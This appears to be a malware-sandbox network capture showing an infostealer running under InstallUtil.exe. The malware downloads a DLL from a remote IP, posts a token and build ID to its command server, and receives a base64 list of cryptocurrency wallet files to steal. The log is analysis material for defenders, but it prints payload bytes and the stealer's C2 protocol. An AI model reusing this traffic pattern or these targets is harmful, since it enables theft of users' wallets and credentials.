                                                                                                                2024-10-08 02:59:59 UTC16384INData Raw: 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74
                                                                                                                Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                                                                2024-10-08 02:59:59 UTC16384INData Raw: 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85
                                                                                                                Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                2024-10-08 02:59:59 UTC15604INData Raw: cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73
                                                                                                                Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicros


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.44977549.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:00 UTC194OUTGET /nss3.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:00 UTC262INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:00 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 2046288
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 03:00:00 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 03:00:00 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9
                                                                                                                Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08
                                                                                                                Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b
                                                                                                                Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b
                                                                                                                Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2
                                                                                                                Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c
                                                                                                                Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff
                                                                                                                Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01
                                                                                                                Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00
                                                                                                                Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.44979349.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:03 UTC279OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 1145
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:03 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------FHIDBKFCAAEBFIDHDBAECont
                                                                                                                2024-10-08 03:00:04 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:03 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.44980249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:04 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:04 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DGIJECGDGCBKECAKFBGCCont
                                                                                                                2024-10-08 03:00:05 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:05 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:05 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.44981249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:05 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------EBAKKFHJDBKKEBFHDAAECont
                                                                                                                2024-10-08 03:00:06 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:06 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
